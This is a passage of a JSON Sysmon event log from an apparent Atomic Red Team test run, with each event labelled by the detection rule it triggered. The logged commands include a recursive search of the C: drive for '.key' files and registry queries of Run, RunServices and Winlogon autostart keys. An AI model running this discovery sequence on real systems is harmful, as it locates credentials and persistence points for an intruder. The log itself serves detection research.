(WinBuild.160101.0800)","Hashes":"SHA1=393F2422D22079BFB0022598D70BEB294F2024F4,MD5=DC0816790EFA08AA5B55C1EECFDDB525,SHA256=750AB5E1F3EB18CC42A4A4C7BAB27753F6B26FB9752AD3861833753091044281,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F","Image":"C:\\Windows\\System32\\findstr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D859-5D31-0000-0010FB8F2F00","ParentProcessId":888,"ProcessGuid":"747F3D96-D859-5D31-0000-00109E932F00","ProcessId":948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:48:57.547"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3679,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:48:57.570057Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E83B3100","ParentProcessId":2888,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010413E3100","ProcessId":5348,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.176"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3682,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.180586Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ProcessId":5984,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3683,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.227372Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00107A403100","ParentProcessId":5984,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010CC423100","ProcessId":5256,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3684,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.249442Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ProcessId":5016,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.284"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3685,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.304938Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001009453100","ParentProcessId":5016,"ProcessGuid":"747F3D96-D87C-5D31-0000-00105B473100","ProcessId":6208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.327"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3686,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.335446Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.377"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3687,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.389557Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001097493100","ParentProcessId":1680,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010E94B3100","ProcessId":3680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.409"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3688,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.413390Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ProcessId":1428,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.447"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3689,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.463556Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010264E3100","ParentProcessId":1428,"ProcessGuid":"747F3D96-D87C-5D31-0000-001078503100","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.493"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3690,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.497481Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010B4523100","ParentProcessId":4016,"ProcessGuid":"747F3D96-D87C-5D31-0000-001006553100","ProcessId":5024,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.575"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3692,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.585243Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-00103F573100","ParentProcessId":2440,"ProcessGuid":"747F3D96-D87C-5D31-0000-001080593100","ProcessId":4360,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3694,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.678107Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010CA5B3100","ParentProcessId":956,"ProcessGuid":"747F3D96-D87C-5D31-0000-00101D5E3100","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.739"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3696,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.743506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-001056603100","ParentProcessId":6832,"ProcessGuid":"747F3D96-D87C-5D31-0000-0010A8623100","ProcessId":6436,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.803"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3698,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.807707Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Query Registry"],"event":{"Event":{"EventData":{"CommandLine":"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D87C-5D31-0000-0010E1643100","ParentProcessId":5936,"ProcessGuid":"747F3D96-D87C-5D31-0000-001033673100","ProcessId":7144,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:49:32.865"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3700,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:49:32.868916Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
